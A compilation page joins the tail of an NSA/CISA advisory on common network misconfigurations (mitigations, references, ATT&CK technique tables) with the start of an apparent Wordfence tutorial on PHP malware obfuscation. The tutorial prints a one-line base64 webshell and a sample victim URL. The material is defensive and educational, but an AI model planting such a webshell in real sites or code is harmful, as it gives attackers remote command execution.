Unrestricted code executionEnable system settings that prevent the ability to run applications downloaded from untrusted sources.[52]Use application control tools that restrict program execution by default, also known as allowlisting [D3-EAL]. Ensure that the tools examine digital signatures and other key attributes, rather than just relying on filenames, especially since malware often attempts to masquerade as common Operating System (OS) utilities [M1038]. Explicitly allow certain .exe files to run, while blocking all others by default.Block or prevent the execution of known vulnerable drivers that adversaries may exploit to execute code in kernel mode. Validate driver block rules in audit mode to ensure stability prior to production deployment [D3-OSM].Constrain scripting languages to prevent malicious activities, audit script logs, and restrict scripting languages that are not used in the environment [D3-SEA]. See joint Cybersecurity Information Sheet: Keeping PowerShell: Security Measures to Use and Embrace.[53]Use read-only containers and minimal images, when possible, to prevent the running of commands.Regularly analyze border and host-level protections, including spam-filtering capabilities, to ensure their continued effectiveness in blocking the delivery and execution of malware [D3-MA]. Assess whether HTML Application (HTA) files are used for business purposes in your environment; if HTAs are not used, remap the default program for opening them from mshta.exe to notepad.exe.

Software Manufacturers

NSA and CISA recommend software manufacturers implement the recommendations in Table 11 to reduce the prevalence of misconfigurations identified in this advisory. These mitigations align with tactics provided in joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default. NSA and CISA strongly encourage software manufacturers apply these recommendations to ensure their products are secure “out of the box” and do not require customers to spend additional resources making configuration changes, performing monitoring, and conducting routine updates to keep their systems secure.[1]

MisconfigurationRecommendations for Software Manufacturers
Default configurations of software and applicationsEmbed security controls into product architecture from the start of development and throughout the entire SDLC by following best practices in NIST’s Secure Software Development Framework (SSDF), SP 800-218.[54]Provide software with security features enabled “out of the box” and accompanied with “loosening” guides instead of hardening guides. “Loosening” guides should explain the business risk of decisions in plain, understandable language.
Default configurations of software and applications: Default credentialsEliminate default passwords: Do not provide software with default passwords that are universally shared. To eliminate default passwords, require administrators to set a “strong” password [CPG 2.B] during installation and configuration.
Default configurations of software and applications: Default service permissions and configuration settingsConsider the user experience consequences of security settings: Each new setting increases the cognitive burden on end users and should be assessed in conjunction with the business benefit it derives. Ideally, a setting should not exist; instead, the most secure setting should be integrated into the product by default. When configuration is necessary, the default option should be broadly secure against common threats.
Improper separation of user/administrator privilege:Excessive account privileges,Elevated service account permissions, andNon-essential use of elevated accountsDesign products so that the compromise of a single security control does not result in compromise of the entire system. For example, ensuring that user privileges are narrowly provisioned by default and ACLs are employed can reduce the impact of a compromised account. Also, software sandboxing techniques can quarantine a vulnerability to limit compromise of an entire application.Automatically generate reports for:Administrators of inactive accounts. Prompt administrators to set a maximum inactive time and automatically suspend accounts that exceed that threshold.Administrators of accounts with administrator privileges and suggest ways to reduce privilege sprawl.Automatically alert administrators of infrequently used services and provide recommendations for disabling them or implementing ACLs.
Insufficient internal network monitoring Provide high-quality audit logs to customers at no extra charge. Audit logs are crucial for detecting and escalating potential security incidents. They are also crucial during an investigation of a suspected or confirmed security incident. Consider best practices such as providing easy integration with a security information and event management (SIEM) system with application programming interface (API) access that uses coordinated universal time (UTC), standard time zone formatting, and robust documentation techniques.
Lack of network segmentationEnsure products are compatible with and tested in segmented network environments.
Poor patch management: Lack of regular patchingTake steps to eliminate entire classes of vulnerabilities by embedding security controls into product architecture from the start of development and throughout the SDLC by following best practices in NIST’s SSDFSP 800-218.[54] Pay special attention to:Following secure coding practices [SSDF PW 5.1]. Use memory-safe programming languages where possible, parametrized queries, and web template languages.Conducting code reviews [SSDF PW 7.2, RV 1.2] against peer coding standards, checking for backdoors, malicious content, and logic flaws.Testing code to identify vulnerabilities and verify compliance with security requirements [SSDF PW 8.2].Ensure that published CVEs include root cause or common weakness enumeration (CWE) to enable industry-wide analysis of software security design flaws.
Poor patch management: Use of unsupported operating OSs and outdated firmwareCommunicate the business risk of using unsupported OSs and firmware in plain, understandable language.
Bypass of system access controlsProvide sufficient detail in audit records to detect bypass of system controls and queries to monitor audit logs for traces of such suspicious activity (e.g., for when an essential step of an authentication or authorization flow is missing).
Weak or Misconfigured MFA Methods: Misconfigured Smart Cards or Tokens Fully support MFA for all users, making MFA the default rather than an opt-in feature. Utilize threat modeling for authentication assertions and alternate credentials to examine how they could be abused to bypass MFA requirements.
Weak or Misconfigured MFA Methods: Lack of phishing-resistant MFAMandate MFA, ideally phishing-resistant, for privileged users and make MFA a default rather than an opt-in feature.[3]
Insufficient ACL on network shares and servicesEnforce use of ACLs with default ACLs only allowing the minimum access needed, along with easy-to-use tools to regularly audit and adjust ACLs to the minimum access needed.
Poor credential hygiene: easily crackable passwords Allow administrators to configure a password policy consistent with NIST’s guidelines—do not require counterproductive restrictions such as enforcing character types or the periodic rotation of passwords.[29]Allow users to use password managers to effortlessly generate and use secure, random passwords within products.
Poor credential hygiene: cleartext password disclosureSalt and hash passwords using a secure hashing algorithm with high computational cost to make brute force cracking more difficult.
Unrestricted code executionSupport execution controls within operating systems and applications “out of the box” by default at no extra charge for all customers, to limit malicious actors’ ability to abuse functionality or launch unusual applications without administrator or informed user approval.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, NSA and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. NSA and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 12–Table 21).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and NSA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

LEARN FROM HISTORY

The misconfigurations described above are all too common in assessments and the techniques listed are standard ones leveraged by multiple malicious actors, resulting in numerous real network compromises. Learn from the weaknesses of others and implement the mitigations above properly to protect the network, its sensitive information, and critical missions.

WORKS CITED

[1]   Joint Guide: Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default (2023), https://www.cisa.gov/sites/default/files/2023-06/principles_approaches_for_security-by-design-default_508c.pdf
[2]   CISA, Known Exploited Vulnerabilities Catalog, https://www.cisa.gov/known-exploited-vulnerabilities-catalog
[3]   CISA, Implementing Phishing-Resistant MFA, https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf
[4]   MITRE, ATT&CK for Enterprise, https://attack.mitre.org/versions/v13/matrices/enterprise/
[5]   MITRE, D3FEND, https://d3fend.mitre.org/
[6]   CISA, Best Practices for MITRE ATT&CK Mapping, https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping
[7]   CISA, Decider Tool, https://github.com/cisagov/Decider/
[8]   CISA, Cyber Assessment Fact Sheet, https://www.cisa.gov/sites/default/files/publications/VM_Assessments_Fact_Sheet_RVA_508C.pdf
[9]   Joint CSA: Weak Security Controls and Practices Routinely Exploited for Initial Access, https://media.defense.gov/2022/May/17/2002998718/-1/-1/0/CSA_WEAK_SECURITY_CONTROLS_PRACTICES_EXPLOITED_FOR_INITIAL_ACCESS.PDF
[10]  Microsoft KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS), https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429
[11]  Raj Chandel, Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints, https://www.hackingarticles.in/domain-escalation-petitpotam-ntlm-relay-to-adcs-endpoints/
[12]  SpecterOps – Will Schroeder, Certified Pre-Owned, https://posts.specterops.io/certified-pre-owned-d95910965cd2
[13]  CISA, CSA: CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a
[14]  Joint CSA: Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a
[15]  Joint CSA: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a
[16]  Joint CSA: Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a
[17]  Microsoft, How to verify that MS17-010 is installed, https://support.microsoft.com/en-us/topic/how-to-verify-that-ms17-010-is-installed-f55d3f13-7a9c-688c-260b-477d0ec9f2c8
[18]  Microsoft, Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644), https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067
[19]  Joint CSA: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-277a
[20]  CISA, Malware Analysis Report: 10365227.r1.v1, https://www.cisa.gov/sites/default/files/2023-06/mar-10365227.r1.v1.clear_.pdf
[21]  Joint CSA: #StopRansomware: BianLian Ransomware Group, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a
[22]  CISA Analysis Report: FiveHands Ransomware, https://www.cisa.gov/news-events/analysis-reports/ar21-126a
[23]  Snaffler, https://github.com/SnaffCon/Snaffler
[24]  CISA, Cross-Sector Cybersecurity Performance Goals, https://www.cisa.gov/cross-sector-cybersecurity-performance-goals
[25]  Defense Information Systems Agency (DISA), Security Technical Implementation Guides (STIGs), https://public.cyber.mil/stigs/
[26]  NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
[27]  NSA, Actively Manage Systems and Configurations, https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively%20Manage%20Systems%20and%20Configurations.docx%20-%20Copy.pdf
[28]  NSA, Cybersecurity Advisories & Guidance, https://www.nsa.gov/cybersecurity-guidance
[29]  National Institute of Standards and Technologies (NIST), NIST SP 800-63B: Digital Identity Guidelines: Authentication and Lifecycle Management, https://csrc.nist.gov/pubs/sp/800/63/b/upd2/final
[30]  Microsoft, Uninstall-AdcsWebEnrollment, https://learn.microsoft.com/en-us/powershell/module/adcsdeployment/uninstall-adcswebenrollment
[31]  Microsoft, KB5021989: Extended Protection for Authentication, https://support.microsoft.com/en-au/topic/kb5021989-extended-protection-for-authentication-1b6ea84d-377b-4677-a0b8-af74efbb243f
[32]  Microsoft, Network security: Restrict NTLM: NTLM authentication in this domain, https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-ntlm-authentication-in-this-domain
[33]  Microsoft, Network security: Restrict NTLM: Incoming NTLM traffic, https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-incoming-ntlm-traffic
[34]  Microsoft, How to disable the Subject Alternative Name for UPN mapping, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/disable-subject-alternative-name-upn-mapping
[35]  Microsoft, Overview of Server Message Block signing, https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing
[36]  Microsoft, SMB signing required by default in Windows Insider, https://aka.ms/SmbSigningRequired
[37]  NSA, Defend Privileges and Accounts, https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend%20Privileges%20and%20Accounts%20-%20Copy.pdf
[38]  NSA, Advancing Zero Trust Maturity Throughout the User Pillar, https://media.defense.gov/2023/Mar/14/2003178390/-1/-1/0/CSI_Zero_Trust_User_Pillar_v1.1.PDF
[39]  NSA, Continuously Hunt for Network Intrusions, https://media.defense.gov/2019/Sep/09/2002180360/-1/-1/0/Continuously%20Hunt%20for%20Network%20Intrusions%20-%20Copy.pdf
[40]  Joint CSI: Detect and Prevent Web Shell Malware, https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
[41]  NSA, Segment Networks and Deploy Application-aware Defenses, https://media.defense.gov/2019/Sep/09/2002180325/-1/-1/0/Segment%20Networks%20and%20Deploy%20Application%20Aware%20Defenses%20-%20Copy.pdf
[42]  Joint CSA: NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems, https://media.defense.gov/2020/Jul/23/2002462846/-1/-1/0/OT_ADVISORY-DUAL-OFFICIAL-20200722.PDF
[43]  NSA, Stop Malicious Cyber Activity Against Connected Operational Technology, https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/0/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF
[44]  NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
[45]  NSA, Update and Upgrade Software Immediately, https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf
[46]  Microsoft, Microsoft Security Advisory 2871997: Update to Improve Credentials Protection and Management, https://learn.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2871997
[47]  CISA, Secure Cloud Business Applications Hybrid Identity Solutions Architecture, https://www.cisa.gov/sites/default/files/2023-03/csso-scuba-guidance_document-hybrid_identity_solutions_architecture-2023.03.22-final.pdf
[48]  CISA, Secure Cloud Business Applications (SCuBA) Project, https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project
[49]  NSA, Transition to Multi-factor Authentication, https://media.defense.gov/2019/Sep/09/2002180346/-1/-1/0/Transition%20to%20Multi-factor%20Authentication%20-%20Copy.pdf
[50]  Committee on National Security Systems (CNSS), CNSS Policy 15, https://www.cnss.gov/CNSS/issuances/Policies.cfm
[51]  NSA, NSA Releases Future Quantum-Resistant (QR) Algorithm Requirements for National Security Systems, https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/3148990/nsa-releases-future-quantum-resistant-qr-algorithm-requirements-for-national-se/
[52]  NSA, Enforce Signed Software Execution Policies, https://media.defense.gov/2019/Sep/09/2002180334/-1/-1/0/Enforce%20Signed%20Software%20Execution%20Policies%20-%20Copy.pdf
[53]  Joint CSI: Keeping PowerShell: Security Measures to Use and Embrace, https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF
[54]  NIST, NIST SP 800-218: Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities, https://csrc.nist.gov/publications/detail/sp/800-218/final

Disclaimer of Endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Trademarks

Active Directory, Microsoft, and Windows are registered trademarks of Microsoft Corporation.
MITRE ATT&CK is registered trademark and MITRE D3FEND is a trademark of The MITRE Corporation.
SoftPerfect is a registered trademark of SoftPerfect Proprietary Limited Company.
Telerik is a registered trademark of Progress Software Corporation.
VMware is a registered trademark of VMWare, Inc.
Zimbra is a registered trademark of Synacor, Inc.

Purpose

This document was developed in furtherance of the authoring cybersecurity organizations’ missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact

Cybersecurity Report Feedback: CybersecurityReports@nsa.gov
General Cybersecurity Inquiries: Cybersecurity_Requests@nsa.gov 
Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov 

To report suspicious activity contact CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Appendix: MITRE ATT&CK Tactics and Techniques

See Table 12–Table 21 for all referenced threat actor tactics and techniques in this advisory.

Technique TitleIDUse
Active Scanning: Vulnerability ScanningT1595.002Malicious actors scan victims for vulnerabilities that be exploited for initial access.
Gather Victim Host InformationT1592Malicious actors gather information on victim client configurations and/or vulnerabilities through vulnerabilities scans and searching the web.
Gather Victim Identity Information: CredentialsT1589.001Malicious actors find default credentials through searching the web.
Phishing for InformationT1598Malicious actors masquerade as IT staff and convince a target user to provide their MFA code over the phone to gain access to email and other organizational resources.
Technique TitleIDUse
External Remote ServicesT1133Malicious actors use default credentials for VPN access to internal networks.
Valid Accounts: Default AccountsT1078.001Malicious actors gain authenticated access to devices by finding default credentials through searching the web.Malicious actors use default credentials for VPN access to internal networks, and default administrative credentials to gain access to web applications and databases.
Exploit Public-Facing ApplicationT1190Malicious actors exploit CVEs in Telerik UI, VM Horizon, Zimbra Collaboration Suite, and other applications for initial access to victim organizations.
PhishingT1566Malicious actors gain initial access to systems by phishing to entice end users to download and execute malicious payloads.
Trust RelationshipT1199Malicious actors gain access to OT networks despite prior assurance that the networks were fully air gapped, with no possible connection to the IT network, by finding special purpose, forgotten, or even accidental network connections.
Technique TitleIDUse
Software Deployment ToolsT1072Malicious actors use default or captured credentials on software deployment tools to execute code and move laterally.
User ExecutionT1204Malicious actors gain initial access to systems by phishing to entice end users to download and execute malicious payloads or to run code on their workstations.
Command and Scripting InterpreterT1059Malicious actors use scripting languages to obscure their actions and bypass allowlisting.
Command and Scripting Interpreter: Visual BasicT1059.005Malicious actors use macros for initial access, persistence, and lateral movement.
Technique TitleIDUse
Account ManipulationT1098Malicious actors reset built-in administrative accounts via predictable, forgotten password questions.
Technique TitleIDUse
Valid AccountsT1078Malicious actors analyze topical and nested Active Directory groups to find privileged accounts to target.
Valid Accounts: Domain AccountsT1078.002Malicious actors obtain loaded domain credentials from printers and scanners and use them to move laterally from the network device.
Exploitation for Privilege EscalationT1068Malicious actors load vulnerable drivers and then exploit their known vulnerabilities to execute code in the kernel with the highest level of system privileges to completely compromise the device.
Technique TitleIDUse
Obfuscated Files or Information: Command ObfuscationT1027.010Malicious actors often use scripting languages to obscure their actions.
Technique TitleIDUse
Adversary-in-the-MiddleT1557Malicious actors force a device to communicate through actor-controlled systems, so they can collect information or perform additional actions.
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB RelayT1557.001Malicious actors execute spoofing, poisoning, and relay techniques if Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Server Message Block (SMB) services are enabled in a network.
Brute Force: Password CrackingT1110.002Malicious actors capture user hashes and leverage dictionary wordlists and rulesets to extract cleartext passwords.
Credentials from Password StoresT1555Malicious actors gain access to and crack credentials from PFX stores, enabling elevation of privileges and lateral movement within networks.
Multi-Factor Authentication InterceptionT1111Malicious actors can obtain password hashes for accounts enabled for MFA with smart codes or tokens and use the hash via PtH techniques.
Multi-Factor Authentication Request GenerationT1621Malicious actors use “push bombing” against non-phishing resistant MFA to induce “MFA fatigue” in victims, gaining access to MFA authentication credentials or bypassing MFA, and accessing the MFA-protected system.
Steal Application Access TokenT1528Malicious actors can steal administrator account credentials and the authentication token generated by Active Directory when the account is logged into a compromised host.
Steal or Forge Authentication CertificatesT1649Unauthenticated malicious actors coerce an ADCS server to authenticate to an actor-controlled server, and then relay that authentication to the web certificate enrollment application to obtain a trusted illegitimate certificate.
Steal or Forge Kerberos Tickets: Golden TicketT1558.001Malicious actors who have obtained authentication certificates can use the certificate for Active Directory authentication to obtain a Kerberos TGT.
Steal or Forge Kerberos Tickets: KerberoastingT1558.003Malicious actors obtain and abuse valid Kerberos TGTs to elevate privileges and laterally move throughout an organization’s network.
Unsecured Credentials: Credentials in FilesT1552.001Malicious actors find cleartext credentials that organizations or individual users store in spreadsheets, configuration files, and other documents.
Technique TitleIDUse
Account DiscoveryT1087Malicious actors with valid domain credentials enumerate the AD to discover elevated accounts and where they are used.
File and Directory DiscoveryT1083Malicious actors use commands, such as net share, open source tools, such as SoftPerfect Network Scanner, or custom malware, such as CovalentStealer to discover and categorize files.Malicious actors search for text files, spreadsheets, documents, and configuration files in hopes of obtaining desired information, such as cleartext passwords.
Network Share DiscoveryT1135Malicious actors use commands, such as net share, open source tools, such as SoftPerfect Network Scanner, or custom malware, such as CovalentStealer, to look for shared folders and drives.
Technique TitleIDUse
Exploitation of Remote ServicesT1210Malicious actors can exploit OS and firmware vulnerabilities to gain unauthorized network access, compromise sensitive data, and disrupt operations.
Remote Services: SMB/Windows Admin SharesT1021.002If SMB signing is not enforced, malicious actors can use name resolution poisoning to access remote systems.
Use Alternate Authentication Material: Application Access TokenT1550.001Malicious actors with stolen administrator account credentials and AD authentication tokens can use them to operate with elevated permissions throughout the domain.
Use Alternate Authentication Material: Pass the HashT1550.002Malicious actors collect hashes in a network and authenticate as a user without having access to the user’s cleartext password.
Technique TitleIDUse
Data from Network Shared DriveT1039Malicious actors find sensitive information on network shares that could facilitate follow-on activity or provide opportunities for extortion.

Source :
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a

Know your Malware – A Beginner’s Guide to Encoding Techniques Used to Obfuscate Malware

Ram Gall
October 2, 2023

With the launch of Wordfence CLI, our high performance security scanner that can detect the vast majority of PHP malware targeting WordPress, Wordfence continues to emphasize the importance of malware detection and remediation. Malware targeting WordPress uses a variety of obfuscation techniques to avoid detection, and today’s post dives into some of the most common built-in PHP functionality malware often makes use of in order to do this.

What is Obfuscation?

Obfuscation is the process of concealing the purpose or functionality of code or data so that it evades detection and is more difficult for a human or security software to analyze, but still fulfills its intended purpose.

Obfuscation makes use of various types of encoding techniques, but is not exactly the same thing as encoding. There are countless legitimate uses for encoding data, including saving space through compression, transmitting data over a network, and packaging code so that it can be easily interpreted by programs in an expected format. Meanwhile obfuscation is intentionally designed to prevent understanding and detection by humans and security software.

Obfuscation is also different from encryption in that it can typically be reversed without a “key”, though there are some encoding techniques, such as XOR encoding, which do use keys and are used in both encryption and obfuscation.

Encoding Techniques

Since obfuscation often relies heavily on encoding techniques, It’s important to understand what these techniques look like, their typical legitimate use cases, and signs that they’re being used to hide something potentially malicious. In today’s article, we will cover some of the most commonly used encoding techniques, and teach you how to spot legitimate uses as well as potentially suspicious patterns.

Base64 Encoding

What is Base64 encoding?

Base64 encoding is widely used to send and store data. If you’ve ever played with Linux and tried to look at an executable file using the cat command, you might have noticed that your terminal starts acting very strangely. This is because binary data includes an enormous number of potential byte sequences, and software that’s not designed to interpret a particular file format can incorrectly interpret some of these sequences as commands.

Base64 encoding allows any data, including binary data, to be stored and transmitted as text which makes it very convenient for programs to talk to one another without being misunderstood, especially over a network.
It uses 26 lower-case letters, 26 upper-case letters, the digits 0-9, and the ‘+’ and ‘/’ symbols for a total of 64 characters, plus ‘=’ for padding.

Note that, unlike the Base 8(Octal) and Base 16(Hexadecimal) encodings we’ll cover later, base64 is not a direct representation of the underlying bytes. Instead, it converts their octal representations to Base 10(Decimal) and then uses a lookup table to assign a character value. You can find out more about this process in the Wikipedia article on Base64 encoding.

How is Base64 Encoding Used Legitimately?

You’ve likely seen base64 encoded data in the past, and it’s very easy to spot – for instance, SGVsbG8sIFdvcmxkIQ== decodes to “Hello, World!” and you can run the code snippet:

1<?php echobase64_decode('SGVsbG8sIFdvcmxkIQ==');

to see this in action.

PHP uses the base64_encode and base64_decode functions to encode and decode Base64-encoded data. Many applications store information in this format as data files or database entries, so the presence of the base64_encode and base64_decode functions in a PHP file are often no cause for concern on their own.

How is Base64 Encoding Used by Malware?

It is significantly less common for base64-encoded data to be hardcoded into a PHP file, especially one that executes it as code.

For example,

1<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7'));

is a minimalist webshell. The eval function tells PHP to execute whatever is decoded by the base64_decode function as PHP, so once the  string of data c3lzdGVtKCRfR0VUWydjbWQnXSk7 is decoded it will execute system($_GET['cmd']);.

This uses the system function to run the contents of the cmd query string parameter as a terminal command. This means that if this webshell was installed on a site as webshell.php, an attacker could go to http://victimsite.com/webshell.php?cmd=ls to run the ls command and list all files in the directory.

Byte Escape Sequences

What are Byte Escape Sequences?

You might already be familiar with some escape sequences, such as \n to denote a new line of text, or \t to denote a tab, but they can also be used to represent binary data.

PHP uses byte escape sequences for this, and they are similar to base64 encoding in that they are a way to represent both text and binary data as text strings.

There are two commonly used byte escape sequence formats used in PHP – Hexadecimal, which uses Base 16, and Octal, which uses Base 8.

Hex encoded byte sequences are represented by \x followed by two characters, which can be any digit from 0 through 9 and the letters ‘a’ through ‘f’.

For example, the text “Hello, World!” can be represented as the following escaped sequence:
\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21.

Octal byte sequences are represented by ‘\’ followed by a one to three digit number from 0 through 377.

For example, the text “Hello, World!” can be represented as the following escaped sequence:
\110\145\154\154\157\54\40\127\157\162\154\144\41.

If you’ve ever worked with Linux filesystem permissions, they are also stored in octal format, for example ‘777’ which denotes that all users have permission to read, write, and execute.

PHP also uses unicode escape sequences, which begin with \u and can be used to encode unicode characters used for international languages as well as as emojis. While unicode escape sequences can be used to bypass security systems, they are less commonly used in malware, and are beyond the scope of this article. If you’d like to learn more about unicode escape sequences, a good resource can be found here. Note that the article is targeted at JavaScript developers, but provides an excellent overview of the concepts involved.

How are Byte Escape Sequences Used Legitimately?

Byte escape sequences are used to store binary information, and many PHP applications use them to store encryption keys and to perform operations that can be sped up by handling binary data directly. As such they are most often found in code libraries for handling encryption and text manipulation and conversion.

How are Byte Escape Sequences Used by Malware?

PHP has an unusual property – any byte escape sequence surrounded by double quotes(“”) is automatically parsed. Moreover, PHP can interpret any valid combination of text, hex escape sequences, octal escape sequences, and unicode escape sequences in a single string. In other words, “He\x6c\x6c\x6f\54\40\127\157rld!” will be processed by PHP as “Hello, World!”. You can actually test this using the following code snippet:

1<?php echo"He\x6c\x6c\x6f\54\40\127\157rld!";

The fact that PHP can easily interpret such sequences but humans usually cannot read them make byte escape sequences ideal for obfuscation. It is very unusual for legitimate software to use mixed encodings in this manner, and so it is a very strong indicator of malicious activity.

Character Encoding

What is Character Encoding?

Character encoding is similar to hex encoding but more limited in that it can only be used to represent text and a very limited subset of control characters. PHP uses the chr function to decode a number between 0 and 255 into a single character, and the ord function to encode a single character back into a numeric value. This is slightly complicated by the fact that the chr function accepts decimal, hexadecimal, and octal formatted numbers, but decimal format is most commonly used.

The following code provides an example of character encoding utilizing chr, and would output “Hello, World!” when executed:

1<?php echochr(72).chr(101).chr(108).chr(108).chr(111).chr(44).chr(32).chr(87).chr(111).chr(114).chr(108).chr(100).chr(33);

Legitimate use of character encoding is somewhat rare in PHP, though it is occasionally used for text manipulation and inserting control characters such as null bytes in place of hex or octal encoding. It is far more commonly used in languages such as JavaScript where the code is often publicly visible.

One common use case is “reverse obfuscation” where character encoding in JavaScript is used to render an email address on a site in a way that a human can read it once the code is executed, but that older automated tools that can only view the uninterpreted code have difficulty scraping.

How is Character Encoding Used by Malware?

Character encoding is used by malware in almost exactly the same way as byte escape sequences, that is, to make the code more difficult for a human to read and security tools to interpret. It is frequently used by malware to hide malicious URLs that the malware then sends sensitive information or redirects visitors to.

Substitution Ciphers(rot13, etc.)

What are Substitution Ciphers?

One of the simplest ways to obfuscate content is to simply substitute letters for other letters. This method is known as a Caesar cipher, and most programming languages have a built-in method to do this, the most popular of which is simply to replace each letter with the one halfway across the alphabet from it, or 13 steps away. As such, “Hello, World!” becomes “Uryyb, Jbeyq!” The rot13 substitutions can be seen in the following table:

A => N

B => O

C => P

D => Q

E => R

F => S

G => T

H => U

I => V

J => W

K => X

L => Y

M => Z

N => A

O => B

P => C

Q => D

R => E

S => F

T => G

U => H

V => I

W => J

X => K

Y => L

Z => M

How are Substitution Ciphers Used Legitimately?

It is uncommon for substitution ciphers to be used in well-architected code, but some legitimate software does use it as a workaround when it has issues running in an environment where naive or poorly configured security software might hinder its intended execution, or when a value needs to be stored that won’t be interfered with by code that is looking for that value. In other words, it is almost always used to evade detection of some kind even by legitimate software.

How are Substitution Ciphers Used by Malware?

Malware frequently uses the str_rot13 function to obfuscate malicious URLs that it sends sensitive data, redirects visitors to, or receives commands from, that might be on a blocklist. It is a relatively strong signal of suspicious behavior, though it is not strong enough on its own to mark a file as malicious.

Compression (gzencoding, zlib encoding, and more)

What is Compression?

Compression refers to the process of compacting data, making it take up less space for storage and less bandwidth for transport. Compression algorithms are fairly complex, though many of them work in part by finding repeated patterns and storing references to them rather than the entire data.

As a very basic example, the text “aaaaabbbccca” could potentially be compressed to “a5b3c3a”. Real compression algorithms are significantly more sophisticated, and there are many other steps involved depending on the type of data being compressed.

There are a number of commonly used compression algorithms, including ones specifically designed to compress images, movies, and audio files. Media compression algorithms are often “lossy” and do not perfectly reconstruct the original data so much as produce output that looks or sounds similar enough to a human that it’s hard to notice.

In today’s article we are going to focus specifically on the functions most commonly used by PHP to compress and decompress arbitrary data, which use “lossless” compression and can perfectly reconstruct the original data from the archived format.

How is Compression used legitimately?

Most people are familiar with zip files, and many websites use compression to load large amounts of content more quickly while saving money on outbound data transfer. The most common compression algorithms used in PHP are Zlib and Gzip, both of which are handled by the Zlib module, though BZip2 is also fairly common.

Note that Gzip is not exactly the same thing as the zip files you may be familiar with as it can only compress single files, while modern zip archives can be configured to use many different algorithms including the one used by Gzip. There is a workaround to the single file problem, however – if you’ve ever seen a file with a .tar.gz extension, It is very common to combine multiple files into a “tarball” and then compress the combined file using gzip.

